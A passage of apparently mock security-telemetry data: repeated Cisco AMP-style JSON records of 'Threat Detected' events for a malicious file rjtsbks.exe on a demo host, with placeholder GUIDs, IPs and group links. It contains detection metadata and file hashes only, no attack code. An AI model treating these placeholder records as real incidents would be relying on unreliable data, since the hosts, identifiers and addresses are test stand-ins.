Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":551000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":551000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":535000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":520000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163593","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":442000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163592","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":442000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163591","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":426000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163590","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":426000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163589","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":426000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163588","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":410000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163587","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":410000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163586","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":395000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163585","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":317000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":317000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":286000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":208000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":208000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163578","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":192000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163577","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":192000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163576","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":145000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 